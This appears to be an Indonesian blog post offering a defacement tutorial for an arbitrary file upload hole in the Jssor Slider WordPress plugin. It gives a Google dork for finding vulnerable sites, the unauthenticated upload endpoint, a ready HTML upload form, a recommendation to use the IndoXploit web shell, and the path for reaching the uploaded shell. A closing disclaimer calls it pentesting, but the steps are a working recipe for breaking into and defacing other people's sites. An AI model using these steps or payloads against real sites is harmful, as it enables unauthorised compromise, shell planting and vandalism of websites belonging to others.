Jssor Arbitary file upload Exploit Wordpres

Jssor Arbitary file upload Exploit Wordpres

Assalamualaikum Wr.Wb
Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa)
Terimakasih telah berkunjung ke web sederhanan ini. Hehe
Kali ini saya akan memberikan Tutorial Deface Jssor Arbitary file upload Exploit Wordpres

Sebelum deface sebaiknya kita mempersiapkan alat dan bahan

-Script deface (saya rasa udah punya sendiri sendiri)
-Dork
inurl:/wp-content/jssor-slider/ site:
-Shel
Gunakan shel IndoXploit aja
-Exploit
/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
-CSRF
<html>
<body>
<form action="SITE.COM/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Baiklah gak usah banyak basa basi
Langsung aja ke tutorialnya
1. Dorking dulu di google

2. Masukkan exploit seperti ini site.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Jika vuln akan ada keterangan seperti ini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


3. Masukkan link tersebut ke dalam csrf. Simpan csrf dengan format html

4. Buka CSRF tersebut menggunakan browser, upload shel kalian


5. Akses shel
/wp-content/jssor-slider/jssor-uploads/nama shel .php
 

Jika masih kurang jelas bisa Lihat tutor di bawah ini


Jangan lupa baca juga
Catatan. Saya Admin tidak pernah bertanggung jawab dengan apa yang kalian perbuat
Jika ada masalah jangan pernah menyalakan website ini 
Tutor ini di buat untuk mengetest/pentester suatu website apakah web itu memiliki bug apa enggak
Mungkin hanya itu kata kata yg bisa saya ucapkan 

Sekian dan Terimakasih
Wassalamualaikum Wr.Wb

Subscribe to receive free email updates:

0 Response to "Jssor Arbitary file upload Exploit Wordpres"

Post a Comment